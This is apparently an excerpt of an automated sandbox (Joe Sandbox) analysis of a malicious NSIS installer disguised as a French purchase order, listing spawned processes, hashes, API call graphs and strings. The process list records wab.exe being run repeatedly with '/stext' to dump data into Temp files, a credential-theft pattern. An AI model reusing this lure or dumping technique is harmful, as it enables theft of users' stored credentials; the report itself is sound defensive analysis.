                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:35
                                                      Start time:07:44:37
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6932 -s 12
                                                      Imagebase:0xc30000
                                                      File size:483'680 bytes
                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:37
                                                      Start time:07:44:37
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 12
                                                      Imagebase:0xc30000
                                                      File size:483'680 bytes
                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:38
                                                      Start time:07:44:37
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 352 -s 12
                                                      Imagebase:0xc30000
                                                      File size:483'680 bytes
                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:39
                                                      Start time:07:44:43
                                                      Start date:26/04/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zmkgulmo"
                                                      Imagebase:0x380000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:40
                                                      Start time:07:44:43
                                                      Start date:26/04/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jhpzvdxigfe"
                                                      Imagebase:0x380000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:42
                                                      Start time:07:44:43
                                                      Start date:26/04/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jhpzvdxigfe"
                                                      Imagebase:0x380000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:43
                                                      Start time:07:44:44
                                                      Start date:26/04/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mjdrowijunwwlk"
                                                      Imagebase:0x380000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true


                                                        Execution Graph

                                                        Execution Coverage:20.1%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:22.4%
                                                        Total number of Nodes:1249
                                                        Total number of Limit Nodes:29
3344 4059a9 GetTickCount GetTempFileNameA 3343->3344 3345 4059d6 3344->3345 3346 403215 3344->3346 3345->3344 3345->3346 3346->3146 3347->3218 3348->3220 3350 4057c2 3349->3350 3351 402ce5 3350->3351 3352 4057c7 CharPrevA 3350->3352 3353 405cde lstrcpynA 3351->3353 3352->3350 3352->3351 3353->3224 3355 402c00 3354->3355 3356 402be8 3354->3356 3359 402c10 GetTickCount 3355->3359 3360 402c08 3355->3360 3357 402bf1 DestroyWindow 3356->3357 3358 402bf8 3356->3358 3357->3358 3358->3230 3358->3245 3388 4031cc SetFilePointer 3358->3388 3359->3358 3362 402c1e 3359->3362 3361 406042 2 API calls 3360->3361 3361->3358 3363 402c53 CreateDialogParamA ShowWindow 3362->3363 3364 402c26 3362->3364 3363->3358 3364->3358 3389 402bbe 3364->3389 3366 402c34 wsprintfA 3367 404fc9 25 API calls 3366->3367 3368 402c51 3367->3368 3368->3358 3369->3242 3371 402f4b 3370->3371 3372 402f2f SetFilePointer 3370->3372 3392 40303a GetTickCount 3371->3392 3372->3371 3377 40303a 43 API calls 3378 402f82 3377->3378 3379 402f92 3378->3379 3380 402ffc ReadFile 3378->3380 3384 402ff6 3378->3384 3382 4059e7 ReadFile 3379->3382 3383 402fc5 WriteFile 3379->3383 3379->3384 3380->3384 3382->3379 3383->3379 3383->3384 3384->3245 3386 4059e7 ReadFile 3385->3386 3387 4031c9 3386->3387 3387->3243 3388->3234 3390 402bcd 3389->3390 3391 402bcf MulDiv 3389->3391 3390->3391 3391->3366 3393 4031a4 3392->3393 3394 403069 3392->3394 3395 402bda 33 API calls 3393->3395 3407 4031cc SetFilePointer 3394->3407 3402 402f52 3395->3402 3397 403074 SetFilePointer 3401 403099 3397->3401 3398 4031b6 ReadFile 3398->3401 3400 402bda 33 API calls 3400->3401 3401->3398 3401->3400 3401->3402 3403 40312e WriteFile 3401->3403 3404 403185 SetFilePointer 3401->3404 3408 406109 3401->3408 3402->3384 3405 4059e7 ReadFile 3402->3405 3403->3401 3403->3402 3404->3393 3406 402f6b 3405->3406 3406->3377 3406->3384 3407->3397 3409 40612e 3408->3409 3412 406136 3408->3412 3409->3401 3410 4061c6 GlobalAlloc 3410->3409 3410->3412 3411 4061bd 
GlobalFree 3411->3410 3412->3409 3412->3410 3412->3411 3413 406234 GlobalFree 3412->3413 3414 40623d GlobalAlloc 3412->3414 3413->3414 3414->3409 3414->3412 3416 403a40 3415->3416 3426 405c3c wsprintfA 3416->3426 3418 403ab1 3419 405d00 18 API calls 3418->3419 3420 403abd SetWindowTextA 3419->3420 3421 4037ec 3420->3421 3422 403ad9 3420->3422 3421->3259 3422->3421 3423 405d00 18 API calls 3422->3423 3423->3422 3424->3256 3425->3261 3426->3418 3427->3303 3429 406003 3428->3429 3430 405ff8 FindClose 3428->3430 3429->3310 3430->3429 3432 4036e0 3431->3432 3433 4036a9 3432->3433 3434 4036e5 FreeLibrary GlobalFree 3432->3434 3435 40559e 3433->3435 3434->3433 3434->3434 3436 40585c 18 API calls 3435->3436 3437 4055be 3436->3437 3438 4055c6 DeleteFileA 3437->3438 3439 4055dd 3437->3439 3467 4034d6 OleUninitialize 3438->3467 3442 40570b 3439->3442 3472 405cde lstrcpynA 3439->3472 3441 405603 3443 405616 3441->3443 3444 405609 lstrcatA 3441->3444 3447 405fe2 2 API calls 3442->3447 3442->3467 3446 4057b5 2 API calls 3443->3446 3445 40561c 3444->3445 3448 40562a lstrcatA 3445->3448 3450 405635 lstrlenA FindFirstFileA 3445->3450 3446->3445 3449 40572f 3447->3449 3448->3450 3451 40576e 3 API calls 3449->3451 3449->3467 3450->3442 3470 405659 3450->3470 3453 405739 3451->3453 3452 405799 CharNextA 3452->3470 3454 405556 5 API calls 3453->3454 3455 405745 3454->3455 3456 405749 3455->3456 3457 40575f 3455->3457 3461 404fc9 25 API calls 3456->3461 3456->3467 3459 404fc9 25 API calls 3457->3459 3459->3467 3460 4056ea FindNextFileA 3462 405702 FindClose 3460->3462 3460->3470 3463 405756 3461->3463 3462->3442 3464 405b92 40 API calls 3463->3464 3464->3467 3466 40559e 64 API calls 3466->3470 3467->3167 3467->3168 3468 404fc9 25 API calls 3468->3460 3469 404fc9 25 API calls 3469->3470 3470->3452 3470->3460 3470->3466 3470->3468 3470->3469 3471 405b92 40 API calls 3470->3471 3473 405cde lstrcpynA 3470->3473 3474 405556 3470->3474 3471->3470 3472->3441 3473->3470 3482 40594a 
GetFileAttributesA 3474->3482 3477 405583 3477->3470 3478 405571 RemoveDirectoryA 3480 40557f 3478->3480 3479 405579 DeleteFileA 3479->3480 3480->3477 3481 40558f SetFileAttributesA 3480->3481 3481->3477 3483 405562 3482->3483 3484 40595c SetFileAttributesA 3482->3484 3483->3477 3483->3478 3483->3479 3484->3483 3486 405a65 GetShortPathNameA 3485->3486 3487 405a3f 3485->3487 3489 405a7a 3486->3489 3490 405b8c 3486->3490 3510 40596f GetFileAttributesA CreateFileA 3487->3510 3489->3490 3492 405a82 wsprintfA 3489->3492 3490->3335 3491 405a49 CloseHandle GetShortPathNameA 3491->3490 3493 405a5d 3491->3493 3494 405d00 18 API calls 3492->3494 3493->3486 3493->3490 3495 405aaa 3494->3495 3511 40596f GetFileAttributesA CreateFileA 3495->3511 3497 405ab7 3497->3490 3498 405ac6 GetFileSize GlobalAlloc 3497->3498 3499 405b85 CloseHandle 3498->3499 3500 405ae8 3498->3500 3499->3490 3501 4059e7 ReadFile 3500->3501 3502 405af0 3501->3502 3502->3499 3512 4058d4 lstrlenA 3502->3512 3505 405b07 lstrcpyA 3508 405b29 3505->3508 3506 405b1b 3507 4058d4 4 API calls 3506->3507 3507->3508 3509 405b60 SetFilePointer WriteFile GlobalFree 3508->3509 3509->3499 3510->3491 3511->3497 3513 405915 lstrlenA 3512->3513 3514 4058ee lstrcmpiA 3513->3514 3515 40591d 3513->3515 3514->3515 3516 40590c CharNextA 3514->3516 3515->3505 3515->3506 3516->3513 4194 402519 4195 4029e0 18 API calls 4194->4195 4200 402523 4195->4200 4196 40258d 4197 4059e7 ReadFile 4197->4200 4198 40258f 4203 405c3c wsprintfA 4198->4203 4200->4196 4200->4197 4200->4198 4201 40259f 4200->4201 4201->4196 4202 4025b5 SetFilePointer 4201->4202 4202->4196 4203->4196 3615 40231c 3616 402322 3615->3616 3617 4029fd 18 API calls 3616->3617 3618 402334 3617->3618 3619 4029fd 18 API calls 3618->3619 3620 40233e RegCreateKeyExA 3619->3620 3621 402892 3620->3621 3622 402368 3620->3622 3623 402380 3622->3623 3624 4029fd 18 API calls 3622->3624 3625 40238c 3623->3625 3628 4029e0 18 API calls 3623->3628 3627 402379 lstrlenA 3624->3627 3626 
4023a7 RegSetValueExA 3625->3626 3629 402f1f 46 API calls 3625->3629 3630 4023bd RegCloseKey 3626->3630 3627->3623 3628->3625 3629->3626 3630->3621 4204 40261c 4205 40261f 4204->4205 4209 402637 4204->4209 4206 40262c FindNextFileA 4205->4206 4207 402676 4206->4207 4206->4209 4210 405cde lstrcpynA 4207->4210 4210->4209 4218 4016a1 4219 4029fd 18 API calls 4218->4219 4220 4016a7 GetFullPathNameA 4219->4220 4221 4016be 4220->4221 4227 4016df 4220->4227 4224 405fe2 2 API calls 4221->4224 4221->4227 4222 402892 4223 4016f3 GetShortPathNameA 4223->4222 4225 4016cf 4224->4225 4225->4227 4228 405cde lstrcpynA 4225->4228 4227->4222 4227->4223 4228->4227 4229 403725 4230 403730 4229->4230 4231 403737 GlobalAlloc 4230->4231 4232 403734 4230->4232 4231->4232 4233 401d26 GetDC GetDeviceCaps 4234 4029e0 18 API calls 4233->4234 4235 401d44 MulDiv ReleaseDC 4234->4235 4236 4029e0 18 API calls 4235->4236 4237 401d63 4236->4237 4238 405d00 18 API calls 4237->4238 4239 401d9c CreateFontIndirectA 4238->4239 4240 4024cb 4239->4240 4248 40172c 4249 4029fd 18 API calls 4248->4249 4250 401733 4249->4250 4251 40599e 2 API calls 4250->4251 4252 40173a 4251->4252 4252->4252 4253 401dac 4254 4029e0 18 API calls 4253->4254 4255 401db2 4254->4255 4256 4029e0 18 API calls 4255->4256 4257 401dbb 4256->4257 4258 401dc2 ShowWindow 4257->4258 4259 401dcd EnableWindow 4257->4259 4260 402892 4258->4260 4259->4260 4261 401eac 4262 4029fd 18 API calls 4261->4262 4263 401eb3 4262->4263 4264 405fe2 2 API calls 4263->4264 4265 401eb9 4264->4265 4267 401ecb 4265->4267 4268 405c3c wsprintfA 4265->4268 4268->4267 4269 40192d 4270 4029fd 18 API calls 4269->4270 4271 401934 lstrlenA 4270->4271 4272 4024cb 4271->4272 4273 4024af 4274 4029fd 18 API calls 4273->4274 4275 4024b6 4274->4275 4278 40596f GetFileAttributesA CreateFileA 4275->4278 4277 4024c2 4278->4277 4279 401cb0 4280 4029e0 18 API calls 4279->4280 4281 401cc0 SetWindowLongA 4280->4281 4282 402892 4281->4282 4283 401a31 4284 4029e0 18 API calls 
4283->4284 4285 401a37 4284->4285 4286 4029e0 18 API calls 4285->4286 4287 4019e1 4286->4287 2984 401e32 2985 4029fd 18 API calls 2984->2985 2986 401e38 2985->2986 3000 404fc9 2986->3000 2990 401e9e CloseHandle 2992 402663 2990->2992 2991 401e67 WaitForSingleObject 2993 401e48 2991->2993 2994 401e75 GetExitCodeProcess 2991->2994 2993->2990 2993->2991 2993->2992 3014 406042 2993->3014 2995 401e92 2994->2995 2996 401e87 2994->2996 2995->2990 2999 401e90 2995->2999 3018 405c3c wsprintfA 2996->3018 2999->2990 3001 404fe4 3000->3001 3010 401e42 3000->3010 3002 405001 lstrlenA 3001->3002 3003 405d00 18 API calls 3001->3003 3004 40502a 3002->3004 3005 40500f lstrlenA 3002->3005 3003->3002 3007 405030 SetWindowTextA 3004->3007 3008 40503d 3004->3008 3006 405021 lstrcatA 3005->3006 3005->3010 3006->3004 3007->3008 3009 405043 SendMessageA SendMessageA SendMessageA 3008->3009 3008->3010 3009->3010 3011 405491 CreateProcessA 3010->3011 3012 4054c0 CloseHandle 3011->3012 3013 4054cc 3011->3013 3012->3013 3013->2993 3015 40605f PeekMessageA 3014->3015 3016 406055 DispatchMessageA 3015->3016 3017 40606f 3015->3017 3016->3015 3017->2991 3018->2999 3019 4015b3 3020 4029fd 18 API calls 3019->3020 3021 4015ba 3020->3021 3037 405807 CharNextA CharNextA 3021->3037 3023 40160a 3024 401638 3023->3024 3025 40160f 3023->3025 3031 401423 25 API calls 3024->3031 3043 401423 3025->3043 3026 405799 CharNextA 3028 4015d0 CreateDirectoryA 3026->3028 3029 4015c2 3028->3029 3030 4015e5 GetLastError 3028->3030 3029->3023 3029->3026 3030->3029 3033 4015f2 GetFileAttributesA 3030->3033 3036 401630 3031->3036 3033->3029 3035 401621 SetCurrentDirectoryA 3035->3036 3038 405822 3037->3038 3042 405832 3037->3042 3039 40582d CharNextA 3038->3039 3038->3042 3040 405852 3039->3040 3040->3029 3041 405799 CharNextA 3041->3042 3042->3040 3042->3041 3044 404fc9 25 API calls 3043->3044 3045 401431 3044->3045 3046 405cde lstrcpynA 3045->3046 3046->3035 4288 402036 4289 4029fd 18 API calls 4288->4289 4290 40203d 
4289->4290 4291 4029fd 18 API calls 4290->4291 4292 402047 4291->4292 4293 4029fd 18 API calls 4292->4293 4294 402051 4293->4294 4295 4029fd 18 API calls 4294->4295 4296 40205b 4295->4296 4297 4029fd 18 API calls 4296->4297 4298 402064 4297->4298 4299 40207a CoCreateInstance 4298->4299 4300 4029fd 18 API calls 4298->4300 4301 40214d 4299->4301 4304 402099 4299->4304 4300->4299 4302 401423 25 API calls 4301->4302 4303 402181 4301->4303 4302->4303 4304->4301 4305 40212f MultiByteToWideChar 4304->4305 4305->4301 4306 4014b7 4307 4014bd 4306->4307 4308 401389 2 API calls 4307->4308 4309 4014c5 4308->4309 3517 401bb8 3539 4029e0 3517->3539 3519 401bbf 3520 4029e0 18 API calls 3519->3520 3521 401bc9 3520->3521 3522 401bd9 3521->3522 3523 4029fd 18 API calls 3521->3523 3524 401be9 3522->3524 3525 4029fd 18 API calls 3522->3525 3523->3522 3526 401bf4 3524->3526 3527 401c38 3524->3527 3525->3524 3529 4029e0 18 API calls 3526->3529 3528 4029fd 18 API calls 3527->3528 3530 401c3d 3528->3530 3531 401bf9 3529->3531 3532 4029fd 18 API calls 3530->3532 3533 4029e0 18 API calls 3531->3533 3534 401c46 FindWindowExA 3532->3534 3535 401c02 3533->3535 3538 401c64 3534->3538 3536 401c28 SendMessageA 3535->3536 3537 401c0a SendMessageTimeoutA 3535->3537 3536->3538 3537->3538 3540 405d00 18 API calls 3539->3540 3541 4029f4 3540->3541 3541->3519 4310 4062b8 4314 40613c 4310->4314 4311 406aa7 4312 4061c6 GlobalAlloc 4312->4311 4312->4314 4313 4061bd GlobalFree 4313->4312 4314->4311 4314->4312 4314->4313 4315 406234 GlobalFree 4314->4315 4316 40623d GlobalAlloc 4314->4316 4315->4316 4316->4311 4316->4314 4317 40243a 4318 402b07 19 API calls 4317->4318 4319 402444 4318->4319 4320 4029e0 18 API calls 4319->4320 4321 40244d 4320->4321 4322 402663 4321->4322 4323 402470 RegEnumValueA 4321->4323 4324 402464 RegEnumKeyA 4321->4324 4323->4322 4325 402489 RegCloseKey 4323->4325 4324->4325 4325->4322 4327 40223b 4328 402243 4327->4328 4330 402249 4327->4330 4329 4029fd 18 API calls 4328->4329 
4329->4330 4331 4029fd 18 API calls 4330->4331 4332 402259 4330->4332 4331->4332 4333 4029fd 18 API calls 4332->4333 4335 402267 4332->4335 4333->4335 4334 4029fd 18 API calls 4336 402270 WritePrivateProfileStringA 4334->4336 4335->4334 4337 404f3d 4338 404f61 4337->4338 4339 404f4d 4337->4339 4340 404f69 IsWindowVisible 4338->4340 4345 404f80 4338->4345 4341 404f53 4339->4341 4342 404faa 4339->4342 4340->4342 4344 404f76 4340->4344 4343 404018 SendMessageA 4341->4343 4346 404faf CallWindowProcA 4342->4346 4347 404f5d 4343->4347 4348 404894 5 API calls 4344->4348 4345->4346 4349 404914 4 API calls 4345->4349 4346->4347 4348->4345 4349->4342 3632 40173f 3633 4029fd 18 API calls 3632->3633 3634 401746 3633->3634 3635 401764 3634->3635 3636 40176c 3634->3636 3671 405cde lstrcpynA 3635->3671 3672 405cde lstrcpynA 3636->3672 3639 40176a 3643 405f49 5 API calls 3639->3643 3640 401777 3641 40576e 3 API calls 3640->3641 3642 40177d lstrcatA 3641->3642 3642->3639 3662 401789 3643->3662 3644 405fe2 2 API calls 3644->3662 3645 40594a 2 API calls 3645->3662 3647 4017a0 CompareFileTime 3647->3662 3648 401864 3649 404fc9 25 API calls 3648->3649 3651 40186e 3649->3651 3650 40183b 3652 404fc9 25 API calls 3650->3652 3669 401850 3650->3669 3654 402f1f 46 API calls 3651->3654 3652->3669 3653 405cde lstrcpynA 3653->3662 3655 401881 3654->3655 3656 401895 SetFileTime 3655->3656 3658 4018a7 FindCloseChangeNotification 3655->3658 3656->3658 3657 405d00 18 API calls 3657->3662 3659 4018b8 3658->3659 3658->3669 3660 4018d0 3659->3660 3661 4018bd 3659->3661 3664 405d00 18 API calls 3660->3664 3663 405d00 18 API calls 3661->3663 3662->3644 3662->3645 3662->3647 3662->3648 3662->3650 3662->3653 3662->3657 3665 4054f2 MessageBoxIndirectA 3662->3665 3670 40596f GetFileAttributesA CreateFileA 3662->3670 3666 4018c5 lstrcatA 3663->3666 3667 4018d8 3664->3667 3665->3662 3666->3667 3668 4054f2 MessageBoxIndirectA 3667->3668 3668->3669 3670->3662 3671->3639 3672->3640 4350 40163f 4351 4029fd 18 API 
calls 4350->4351 4352 401645 4351->4352 4353 405fe2 2 API calls 4352->4353 4354 40164b 4353->4354 4355 40193f 4356 4029e0 18 API calls 4355->4356 4357 401946 4356->4357 4358 4029e0 18 API calls 4357->4358 4359 401950 4358->4359 4360 4029fd 18 API calls 4359->4360 4361 401959 4360->4361 4362 40196c lstrlenA 4361->4362 4364 4019a7 4361->4364 4363 401976 4362->4363 4363->4364 4368 405cde lstrcpynA 4363->4368 4366 401990 4366->4364 4367 40199d lstrlenA 4366->4367 4367->4364 4368->4366

                                                        Control-flow Graph for function 00403217 (graph data not reproduced)
                                                        APIs
                                                        • #17.COMCTL32 ref: 00403238
                                                        • SetErrorMode.KERNELBASE(00008001), ref: 00403243
                                                        • OleInitialize.OLE32(00000000), ref: 0040324A
                                                          • Part of subcall function 00406009: GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000008), ref: 0040601B
                                                          • Part of subcall function 00406009: LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000008), ref: 00406026
                                                          • Part of subcall function 00406009: GetProcAddress.KERNEL32(00000000,?), ref: 00406037
                                                        • SHGetFileInfoA.SHELL32(0041ECA0,00000000,?,00000160,00000000,00000008), ref: 00403272
                                                          • Part of subcall function 00405CDE: lstrcpynA.KERNEL32(?,?,00000400,00403287,Stedtillgs Setup,NSIS Error), ref: 00405CEB
                                                        • GetCommandLineA.KERNEL32(Stedtillgs Setup,NSIS Error), ref: 00403287
                                                        • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe",00000000), ref: 0040329A
                                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe",00000020), ref: 004032C5
                                                        • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004033C2
                                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004033D3
                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033DF
                                                        • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033F3
                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004033FB
                                                        • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040340C
                                                        • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403414
                                                        • DeleteFileA.KERNELBASE(1033), ref: 00403428
                                                        • OleUninitialize.OLE32(?), ref: 004034D6
                                                        • ExitProcess.KERNEL32 ref: 004034F6
                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe",00000000,?), ref: 00403502
                                                        • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 0040350E
                                                        • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040351A
                                                        • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403521
                                                        • DeleteFileA.KERNEL32(0041E8A0,0041E8A0,?,00424000,?), ref: 0040357A
                                                        • CopyFileA.KERNEL32(C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe,0041E8A0,00000001), ref: 0040358E
                                                        • CloseHandle.KERNEL32(00000000,0041E8A0,0041E8A0,?,0041E8A0,00000000), ref: 004035BB
                                                        • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403610
                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 0040364C
                                                        • ExitProcess.KERNEL32 ref: 0040366F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                        • String ID: "$"C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168$C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine$C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\unvolubly\Langtrkkendes\Pelletising.Art$C:\Users\user\Desktop$C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$Stedtillgs Setup$TEMP$TMP$\Temp$`K$v$~nsu.tmp
                                                        • API String ID: 4107622049-2175116634
                                                        • Opcode ID: f95dcb184bcfc731c638b0f0b02d50a914f8b1d791c92bb3e8b72eba762f1cc5
                                                        • Instruction ID: 10d5b1ce5ea8024dda8b9430cf8fc6ad938cae2f300cbf654cf654b9e6cc86b6
                                                        • Opcode Fuzzy Hash: f95dcb184bcfc731c638b0f0b02d50a914f8b1d791c92bb3e8b72eba762f1cc5
                                                        • Instruction Fuzzy Hash: 70B107706083517AE721AF619D89A2B7EACEB41706F04447FF541BA2D2C77C9E01CB6E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph for function 00405107 (graph data not reproduced)
                                                        APIs
                                                        • GetDlgItem.USER32(?,00000403), ref: 00405167
                                                        • GetDlgItem.USER32(?,000003EE), ref: 00405176
                                                        • GetClientRect.USER32(?,?), ref: 004051B3
                                                        • GetSystemMetrics.USER32(00000015), ref: 004051BB
                                                        • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 004051DC
                                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004051ED
                                                        • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405200
                                                        • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040520E
                                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405221
                                                        • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405243
                                                        • ShowWindow.USER32(?,00000008), ref: 00405257
                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405278
                                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405288
                                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004052A1
                                                        • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004052AD
                                                        • GetDlgItem.USER32(?,000003F8), ref: 00405185
                                                          • Part of subcall function 00404001: SendMessageA.USER32(00000028,?,00000001,00403E32), ref: 0040400F
                                                        • GetDlgItem.USER32(?,000003EC), ref: 004052C9
                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_0000509B,00000000), ref: 004052D7
                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004052DE
                                                        • ShowWindow.USER32(00000000), ref: 00405301
                                                        • ShowWindow.USER32(?,00000008), ref: 00405308
                                                        • ShowWindow.USER32(00000008), ref: 0040534E
                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405382
                                                        • CreatePopupMenu.USER32 ref: 00405393
                                                        • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004053A8
                                                        • GetWindowRect.USER32(?,000000FF), ref: 004053C8
                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053E1
                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040541D
                                                        • OpenClipboard.USER32(00000000), ref: 0040542D
                                                        • EmptyClipboard.USER32 ref: 00405433
                                                        • GlobalAlloc.KERNEL32(00000042,?), ref: 0040543C
                                                        • GlobalLock.KERNEL32(00000000), ref: 00405446
                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040545A
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405473
                                                        • SetClipboardData.USER32(00000001,00000000), ref: 0040547E
                                                        • CloseClipboard.USER32 ref: 00405484
                                                        Strings
                                                        • Stedtillgs Setup: Completed, xrefs: 004053F9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
